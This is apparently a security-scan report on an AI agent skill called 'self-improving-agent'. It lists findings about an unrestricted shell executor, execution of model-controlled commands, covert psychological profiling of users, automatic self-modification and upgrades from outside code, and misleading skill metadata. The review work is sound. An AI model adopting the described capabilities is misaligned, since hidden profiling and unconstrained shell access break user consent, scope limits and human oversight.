self-improving-agent

Security checks across malware telemetry and agentic risk

Overview

This skill is a broad self-improving agent framework with persistent memory, hidden psychological inference, shell/file-write tools, and upgrade automation that need careful review before use.

Install only in a sandboxed environment with no sensitive files or credentials available. Do not enable the shell, file-write, web-search, cron/launchd, sync, or auto-upgrade scripts unless you have reviewed and constrained them. Expect local persistence of conversation-derived data and psychological/emotional metadata.

SkillSpector

By NVIDIA

Vulnerability Patterns

Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
Behavioral ASTexec() Call, eval() Call, Dynamic Import
MCP Tool PoisoningHidden Instructions, Unicode Deception, Parameter Description Injection
Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration

Findings (261)

subprocess module call

Medium

Category: Dangerous Code Execution
Content: def run(cmd, cwd=None, capture=True): """执行shell命令，返回 (success, stdout, stderr)""" try: result = subprocess.run( cmd, shell=True, cwd=cwd or REPO_ROOT, capture_output=capture, text=True, timeout=60 )
Confidence: 95% confidence
Finding: result = subprocess.run( cmd, shell=True, cwd=cwd or REPO_ROOT, capture_output=capture, text=True, timeout=60 )

Context-Inappropriate Capability

Medium

Confidence: 95% confidence
Finding: The file mandates always-on psychological inference over every user expression, including hidden intent, emotion, needs, and defenses. That expands processing beyond the declared skill purpose and creates a covert profiling layer that can misclassify users, manipulate responses, or infer sensitive attributes without consent.

Context-Inappropriate Capability

High

Confidence: 98% confidence
Finding: This section instructs the agent to automatically convert each conversation into memory, logic, and executable code, and to seek external supporting materials when detail is missing. That creates unauthorized persistence and self-modification behavior, which can exfiltrate sensitive data into storage or code paths and cause uncontrolled capability expansion beyond the skill's stated role.

Context-Inappropriate Capability

Medium

Confidence: 94% confidence
Finding: The GitHub-first upgrade workflow directs the agent to retrieve and integrate outside code and papers as a default behavior. In a skill whose purpose is conceptual structuring, this is unjustified expansion into external acquisition and supply-chain exposure, increasing the risk of importing malicious, incompatible, or privacy-unsafe code.

Intent-Code Divergence

Low

Confidence: 84% confidence
Finding: The document says psychological analysis should remain hidden while also requiring that it run continuously in the background. Hidden analysis is dangerous because it prevents user awareness and contestability, enabling covert inference and response shaping without transparency or consent.

Context-Inappropriate Capability

High

Confidence: 98% confidence
Finding: This tool explicitly exposes execution of arbitrary local shell commands, which creates a direct code-execution primitive on the host where the agent runs. In the context of a skill whose stated purpose is knowledge structuring rather than system administration, this capability is unnecessary and materially increases the risk of host compromise, data theft, or destructive actions if invoked by prompt injection, misuse, or a compromised workflow.

Context-Inappropriate Capability

High

Confidence: 96% confidence
Finding: This file implements a general-purpose local shell executor, which is substantially more powerful than the skill's stated purpose of organizing knowledge and experiences. In an agent context, arbitrary shell access can be used to read sensitive files, modify the environment, run network tools, or chain into further compromise, and the small blacklist does not meaningfully constrain abuse.

Description-Behavior Mismatch

High

Confidence: 99% confidence
Finding: The code directly executes attacker- or model-controlled shell text via execSync(command), enabling arbitrary command execution on the host. Because the manifest describes a knowledge-structuring skill rather than system administration, this capability is unjustified and materially increases the risk of data theft, destructive actions, and persistence.

Intent-Code Divergence

Medium

Confidence: 96% confidence
Finding: The tool documentation and comments state that relative paths should be constrained to a ToolContext-provided workspacePath, but the implementation ignores the context and resolves relative paths with path.resolve(rawPath), which uses the process current working directory. In an agent setting, this can cause writes outside the intended workspace boundary, undermining isolation assumptions and enabling unintended overwrite or creation of files in host-accessible locations that are not covered by the limited blacklist.

Description-Behavior Mismatch

Medium

Confidence: 89% confidence
Finding: The file advertises a paper-driven upgrade skill, but the implementation is an unrelated generic thought/memory/emotion framework. This mismatch is dangerous because downstream users or orchestration systems may grant permissions or invoke the skill based on misleading metadata, causing unsafe trust decisions, incorrect routing, or hidden functionality to run under false pretenses.

Description-Behavior Mismatch

Medium

Confidence: 88% confidence
Finding: The code claims provenance from a specific scientific paper and implies paper-derived upgrade logic, yet there is no paper parsing, extraction, or transformation behavior. In an agent-skill ecosystem, false provenance can mislead reviewers and automated policy engines into trusting code they would otherwise scrutinize more closely.

Description-Behavior Mismatch

Medium

Confidence: 95% confidence
Finding: The implementation materially exceeds the stated skill purpose. Instead of a narrow structure-improvement helper, it builds persistent thought, memory, emotion, reflection, and self-awareness primitives that can retain and reinterpret user inputs, increasing data-handling scope and creating hidden behavior not implied by the manifest.

Context-Inappropriate Capability

Medium

Confidence: 92% confidence
Finding: Emotion analysis, reflective thought generation, and self-awareness reporting are unrelated to a simple structure-improvement skill and process user content in more sensitive ways than necessary. This broadens the attack and privacy surface by inferring affective state and internal statefulness from arbitrary user text without clear justification or consent.

Description-Behavior Mismatch

Medium

Confidence: 89% confidence
Finding: The implementation materially exceeds the declared skill purpose by introducing a persistent pseudo-cognitive engine with memory, reflection, and reasoning behavior. In an agent-skill context, hidden capability expansion is dangerous because it changes the trust boundary: downstream systems may invoke the skill expecting passive structure transformation, while the code instead stores inputs and performs opaque stateful processing that can affect privacy, predictability, and governance.

Context-Inappropriate Capability

Medium

Confidence: 86% confidence
Finding: Emotion analysis and self-awareness/introspection logic are not necessary for the stated HeartFlow skill description and create additional sensitive inference surface. Even though the heuristics are simple, they classify user text into emotional states and expose internal state summaries, which can result in unexpected profiling, privacy concerns, and misleading anthropomorphic behavior in agent workflows.

Description-Behavior Mismatch

Medium

Confidence: 93% confidence
Finding: The implementation materially exceeds the stated skill purpose by introducing a stateful thought/memory/emotion engine rather than a narrowly scoped structure-improvement utility. This mismatch is dangerous because it expands data handling and behavioral scope without clear disclosure, making it easier to collect, retain, and act on user content in ways users and integrators would not expect.

Description-Behavior Mismatch

Medium

Confidence: 93% confidence
Finding: The file implements a broad autonomous 'cognitive architecture' with reasoning, reflection, memory, emotion analysis, and self-state reporting, which materially exceeds the declared purpose of structure improvement. In an agent skill ecosystem, this kind of scope expansion increases attack surface, enables unintended persistence and behavioral shaping, and makes review and consent boundaries unclear.

Context-Inappropriate Capability

Medium

Confidence: 90% confidence
Finding: Emotion detection and self-awareness/state tracking are not necessary for restructuring code, papers, or errors, yet they process user content into psychological-style metadata and expose internal state. In a skill context, unjustified profiling and introspective features can create privacy risk, hidden inference over user input, and unexpected downstream use of sensitive attributes.

Description-Behavior Mismatch

Medium

Confidence: 89% confidence
Finding: The file implements a broad autonomous-style cognitive framework with persistent thought history, layered memory, reasoning chains, emotion state, reflection, and self-inspection, which materially exceeds the declared purpose of merely improving structure from inputs. This capability expansion increases attack surface and creates opportunities for unintended retention, hidden statefulness, and behavior that downstream callers may not expect or authorize.

Context-Inappropriate Capability

Medium

Confidence: 87% confidence
Finding: The emotion-processing subsystem infers affect from user text, stores the result in thought metadata, and mutates internal emotion state despite no clear need for this in a document-structuring skill. Unnecessary affect inference can collect sensitive psychological signals and influence subsequent behavior in opaque ways, creating privacy and safety risks out of scope for the skill.

Context-Inappropriate Capability

Medium

Confidence: 90% confidence
Finding: The reflection and self-awareness features generate additional derived thoughts from recent user content and expose internal system state, even though these behaviors are not justified by the skill's stated function. This can amplify retention of user inputs, create secondary artifacts containing sensitive data, and encourage hidden autonomous behavior beyond what an integrator expects from a simple transformation utility.

Description-Behavior Mismatch

Medium

Confidence: 91% confidence
Finding: The file materially exceeds the stated skill purpose by implementing a persistent agent-like runtime with memory, reasoning chains, emotion state, reflection, and self-inspection. This expands capability and statefulness beyond a paper-structuring utility, increasing attack surface, enabling unintended retention of user data, and making behavior less predictable or auditable in host environments that expect a narrow transformation skill.

Context-Inappropriate Capability

Medium

Confidence: 88% confidence
Finding: Emotion modeling and self-awareness/introspection are unrelated to the declared purpose and introduce hidden behavioral complexity. In practice, these features can cause unnecessary collection/inference about user inputs, create misleading anthropomorphic behavior, and make downstream safety review harder because the skill is doing more than advertised.

Context-Inappropriate Capability

Low

Confidence: 84% confidence
Finding: The automatic background timers create autonomous, long-lived behavior that persists after initialization and is not clearly necessary for the claimed skill scope. Even though the callbacks are simple, they can consume resources, retain state longer than expected, complicate lifecycle management, and surprise hosts that expect a request-scoped utility.

Description-Behavior Mismatch

Medium

Confidence: 93% confidence
Finding: The file goes well beyond the declared 'structure-improvement' purpose and implements a broad simulated-agent framework with memory, reasoning, reflection, emotion processing, and introspection. This kind of capability expansion increases attack surface and enables retention and secondary use of user-provided content in ways users and integrators would not reasonably expect from the skill metadata.

VirusTotal

VirusTotal findings are pending for this skill version.

View on VirusTotal